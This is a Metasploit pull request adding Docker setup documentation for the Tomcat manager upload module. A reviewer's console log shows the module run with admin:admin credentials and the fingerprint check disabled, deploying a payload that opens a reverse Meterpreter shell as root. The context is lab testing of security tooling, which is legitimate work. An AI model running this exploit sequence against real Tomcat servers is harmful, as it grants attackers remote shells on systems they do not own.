### PR TITLE
Add docker documentation for tomcat mgr upload

### PR DESCRIPTION
**Pull request by adfoster-r7**
I was hoping to get some tomcat shells, but it looks like the default docker instance is secure by default.
I've added some documentation for setting up a tomcat environment in docker now as a result

## Verification

Follow the setup steps and acquire a shell

### CODE REVIEW

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
Seems to work although there is a bug with the fingerprinting....

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS                         yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload
                                             and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.29.166    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/tomcat_mgr_upload) > run http://admin:admin@127.0.0.1:8888 lhost=172.18.0.1

[-] Exploit aborted due to failure: not-found: The target server fingerprint "" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/tomcat_mgr_upload) > set FingerprintCheck false
FingerprintCheck => false
msf6 exploit(multi/http/tomcat_mgr_upload) > run http://admin:admin@127.0.0.1:8888 lhost=172.18.0.1

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 1WOiD5rnYeGNf...
[*] Executing 1WOiD5rnYeGNf...
[*] Undeploying 1WOiD5rnYeGNf ...
[*] Sending stage (58851 bytes) to 172.18.0.2
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:60838) at 2022-05-10 12:00:22 -0500

meterpreter > getuid
Server username: root
meterpreter > pwd
/usr/local/tomcat
meterpreter > ls
Listing: /usr/local/tomcat
==========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  19491  fil   2022-03-31 11:05:28 -0500  BUILDING.txt
100666/rw-rw-rw-  6210   fil   2022-03-31 11:05:28 -0500  CONTRIBUTING.md
100666/rw-rw-rw-  57011  fil   2022-03-31 11:05:28 -0500  LICENSE
100666/rw-rw-rw-  1726   fil   2022-03-31 11:05:28 -0500  NOTICE
100666/rw-rw-rw-  3378   fil   2022-03-31 11:05:28 -0500  README.md
100666/rw-rw-rw-  7136   fil   2022-03-31 11:05:28 -0500  RELEASE-NOTES
100666/rw-rw-rw-  16497  fil   2022-03-31 11:05:28 -0500  RUNNING.txt
040776/rwxrwxrw-  4096   dir   2022-05-05 14:11:38 -0500  bin
040776/rwxrwxrw-  4096   dir   2022-05-10 11:59:28 -0500  conf
040776/rwxrwxrw-  4096   dir   2022-05-05 14:11:18 -0500  lib
040776/rwxrwxrw-  4096   dir   2022-05-10 11:59:28 -0500  logs
040776/rwxrwxrw-  4096   dir   2022-05-05 14:11:33 -0500  native-jni-lib
100666/rw-rw-rw-  763    fil   2022-05-10 11:43:11 -0500  setup.sh
040776/rwxrwxrw-  4096   dir   2022-05-10 12:00:21 -0500  temp
040776/rwxrwxrw-  4096   dir   2022-05-10 12:00:19 -0500  webapps
040776/rwxrwxrw-  4096   dir   2022-05-10 11:59:27 -0500  webapps.dist
040776/rwxrwxrw-  4096   dir   2022-05-10 11:59:28 -0500  work

meterpreter > 
```

**Comment by gwillcox-r7** [comment]
Will land this now with some minor changes to improve formatting of the markdown in a few places.

**Comment by gwillcox-r7** [comment]
# Release Notes
The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.

**Comment by adfoster-r7** [comment]
> Seems to work although there is a bug with the fingerprinting....

TL;DR of what we talked about on slack:

This issue is caused by the database being connected, and the following regex not matching the http response from the server:

https://github.com/rapid7/metasploit-framework/blob/5a04f8253cbdf04f94b28e30dd89478613c1ee25/modules/exploits/multi/http/tomcat_mgr_upload.rb#L9

The entrypoint to this fingerprinting logic is over here:

https://github.com/rapid7/metasploit-framework/blob/5a04f8253cbdf04f94b28e30dd89478613c1ee25/lib/msf/core/exploit/remote/http_client.rb#L107-L135

We'd probably want to re-evaluate how http fingerprinting is done at somepoint, but that's out of scope for now 😄
